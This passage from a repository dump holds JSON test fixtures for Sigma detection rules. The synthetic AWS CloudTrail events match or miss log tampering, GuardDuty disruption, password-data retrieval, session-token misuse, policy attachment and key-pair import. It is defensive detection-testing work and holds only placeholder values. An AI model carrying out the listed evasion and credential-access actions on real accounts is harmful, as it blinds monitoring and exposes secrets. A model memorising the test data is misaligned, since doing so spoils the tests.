"userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateRoute", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_deleteflowlogs_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "DeleteFlowLogs", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteFlowLogs", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_guardduty_disruption_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "guardduty.amazonaws.com", 27 | "eventName": "CreateIPSet", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateIPSet", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_getpassworddate_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "GetPasswordData", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetPasswordData", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_dbcluster_actions_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "ModifyDBCluster", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ModifyDBCluster", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sts_getsessiontoken_misuse_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "sts.amazonaws.com", 27 | "eventName": "GetSessionToken", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "GetSessionToken", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_attachpolicy_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "iam.amazonaws.com", 27 | "eventName": "AttachUserPolicy", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AttachUserPolicy", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_import_key_pair_activity_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "ImportKeyPair", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ImportKeyPair", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_eks_cluster_created_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "eks.amazonaws.com", 27 | "eventName": "CreateCluster", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateCluster", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_puteventselectors_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "cloudtrail.amazonaws.com", 27 | "eventName": "PutEventSelectors", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "s3.amazonaws.com", 67 | "eventName": "PutEventSelectors", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_data_management_tampering_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "PutBucketLogging", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "PutBucketLogging", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sso_idp_change_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | 